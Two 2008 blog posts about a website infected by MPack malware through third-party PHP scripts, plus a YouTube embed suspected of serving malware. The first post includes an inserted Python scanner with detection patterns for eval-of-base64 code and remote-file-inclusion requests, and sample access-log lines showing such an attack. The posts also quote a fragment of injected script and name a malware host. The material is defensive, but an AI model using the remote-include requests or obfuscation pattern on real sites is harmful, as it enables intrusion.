2008
08.21

Malware everywhere

So, regarding my last post, perhaps I owe an apology to YouTube regarding malware distribution. I have been chasing the problem for about a month now, and have finally narrowed it down to a virus known as “MPack” from Russia. This is a really nasty one and appears to have several “ports of entry” into a web site.

From what I can tell, the attacks came in through the following php that I innocently installed on my site (not this site), but have since removed:

  • php Hamweather installation (nice app that gives weather in various locations). Hacked through appending .include to the URL with a perl script reference on the end. I notified them of the attack. Hopefully they have corrected it by now.
  • php Mortgage calculator. Supposed to give mortgage estimations at various rates. Looks like it was malicious from the start (especially in some caching stuff with names like ‘smartie’).
  • WordPress blog – could be the ‘free’ template I downloaded. Still not sure how they hacked this one.

What happened then, was that bad files got copied all over the site through the above-mentioned holes:

  • modsoap.php – This one periodically injected really evil JavaScript into the <head> section of the index.php page. The script looks like the following: <script language=JavaScript>function dc(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(lots of numbers and more code here…); Once executing, this script tries to download ActiveX controls and run .exes, exploiting IE weaknesses. These guys did a good job of summarizing the details of the attack.
  • news.php – Looks like a bunch of random characters wrapped in php base64_decode, unzip and eval calls. I think it places modsoap.php elsewhere.
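
The two dropped files above, and the URL-based hole in the weather script listed earlier, each leave a recognizable trace that a site owner can hunt for without reverse-engineering the payload. The following scanner is an added example written for this page, not the author's code or anything shipped by the applications named here. It checks a PHP or HTML file for two indicators (an eval() fed by base64_decode(), optionally through gzinflate/gzuncompress/str_rot13, which generalizes the news.php pattern; and a <script> in <head> consisting mostly of a long numeric array, which matches the modsoap.php injection), and it checks web-server access-log lines for a query parameter whose value is a remote URL, the usual shape of the remote-file-inclusion attack described for the Hamweather install. The sample files, the hex-looking base64 text, the IP addresses and the log lines are all constructed for the example; the MIN_NUMBERS threshold is an assumed tuning value.

```python
import re
from typing import List

# --- constructed sample inputs (not the original malware or the author's logs) ---
SAMPLE_NEWS_PHP = "<?php\neval(gzinflate(base64_decode('H4sIAAAAAAAAA0tJTc4vSQQA')));\n?>"
SAMPLE_CLEAN_PHP = "<?php\n$blob = base64_decode($_POST['blob']);\nfile_put_contents('upload.bin', $blob);\n?>"
_NUMBERS = ",".join(str(1000 + 37 * i) for i in range(120))  # stands in for "lots of numbers"
SAMPLE_INDEX_PHP = (
    "<html><head><title>Weather</title>"
    "<script language=JavaScript>function dc(x){var l=x.length,b=1024,i,j,r,"
    "p=0,s=0,w=0,t=Array(" + _NUMBERS + ");}</script></head><body></body></html>"
)
SAMPLE_BENIGN_INDEX = (
    "<html><head><title>Weather</title>"
    '<script src="/js/menu.js"></script></head><body></body></html>'
)
SAMPLE_ACCESS_LOG = [
    '203.0.113.7 - - [21/Aug/2008:03:14:07 +0000] "GET /weather/index.php?loc=seattle HTTP/1.1" 200 4096',
    '203.0.113.7 - - [21/Aug/2008:03:14:09 +0000] "GET /weather/index.php?page=http://198.51.100.5/s.txt? HTTP/1.1" 200 512',
    '203.0.113.7 - - [21/Aug/2008:03:14:11 +0000] "GET /calc/index.php?inc=http%3A%2F%2F198.51.100.5%2Fs.txt HTTP/1.1" 200 512',
]

# eval() whose argument is base64_decode(), optionally wrapped in a decompress/rot13 call
OBFUSCATED_EVAL = re.compile(
    r"eval\s*\(\s*(?:(?:gzinflate|gzuncompress|str_rot13)\s*\(\s*)?base64_decode\s*\(",
    re.IGNORECASE,
)
# first <script> element that appears after the opening <head> tag
HEAD_SCRIPT = re.compile(r"<head[^>]*>.*?<script[^>]*>(?P<body>.*?)</script>", re.IGNORECASE | re.DOTALL)
NUMERIC_LITERAL = re.compile(r"\b\d+\b")
# query parameter whose value begins with a remote URL, plain or percent-encoded
RFI_PARAM = re.compile(r"[?&][\w.\[\]%]+=(?:https?|ftp)(?::|%3a)(?:/|%2f){2}", re.IGNORECASE)

MIN_NUMBERS = 50  # assumed threshold: legitimate inline scripts rarely carry this many numeric literals


def scan_php_source(src: str) -> List[str]:
    """Return the names of the indicators found in one PHP/HTML file's contents."""
    findings: List[str] = []
    if OBFUSCATED_EVAL.search(src):
        findings.append("eval-of-base64 chain")
    m = HEAD_SCRIPT.search(src)
    if m and len(NUMERIC_LITERAL.findall(m.group("body"))) >= MIN_NUMBERS:
        findings.append("dense numeric script in <head>")
    return findings


def find_rfi_requests(log_lines: List[str]) -> List[str]:
    """Return the access-log lines whose query string passes a remote URL as a parameter value."""
    return [line for line in log_lines if RFI_PARAM.search(line)]


if __name__ == "__main__":
    samples = [("news.php", SAMPLE_NEWS_PHP), ("index.php", SAMPLE_INDEX_PHP),
               ("benign index.php", SAMPLE_BENIGN_INDEX), ("upload.php", SAMPLE_CLEAN_PHP)]
    for name, src in samples:
        print(f"{name}: {scan_php_source(src) or 'clean'}")
    for line in find_rfi_requests(SAMPLE_ACCESS_LOG):
        print("possible remote include:", line)
```

The base64_decode() check deliberately fires only when the decoded data is handed straight to eval(); a script that merely decodes an upload (the upload.php sample) is left alone, which keeps the false-positive rate low enough to run across a whole document root. To scan a real site, read each .php and .html file into scan_php_source() and feed the access log to find_rfi_requests() line by line.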

Hopefully it's gone now, but it will never be forgotten!

This is definitely a lesson learned in not trusting php script written by others even if they are reputable folks.

midniteblogger.

2008
08.05

Publishing and managing web sites is always an interesting challenge and it helps to be able to generate extra income from them from programs like AdSense. Recently, Google has allowed its publishers to monetize YouTube views/clicks by putting some script on their sites.

That is great, or so I thought, until the other morning I got a couple of emails from Google saying my site was distributing “malware.” Quite a surprise to me since I strive to keep my sites as clean as possible. Sure enough, upon going to the site, my anti-virus protector went crazy, complaining about JS/Psyme.J virus, Bugnraw!generic virus (Bugnraw!generic was detected in …\UIIL.EXE), and Hopee!generic virus. It kept trying to download something from golnanosat.com/in (213.155.0.242) and wanting me to approve an exe to run that was signed by HiPoint Ltd, S.A.

What is going on here?? After a couple of days of digging, I believe the source was the YouTube video strip that I was embedding in my pages. I took it off the page, and the virus warnings stopped.

It’s nearly impossible to get Google to take the “malware” warning off your site, but how ironic that it might be caused by a company that they own. I hope they will at least take a look at this problem and determine if someone is hacking their YouTube publisher scripts.

Anyone else experiencing the same problem?

midniteblogger